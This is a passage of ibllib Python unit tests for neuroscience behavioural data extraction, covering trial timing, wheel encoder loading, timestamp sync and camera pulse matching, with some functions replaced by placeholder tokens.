test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n <function token>\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n <function token>\n <function token>\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n <function token>\n <function token>\n <function token>\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n <function token>\n <function token>\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n <function token>\n <function token>\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 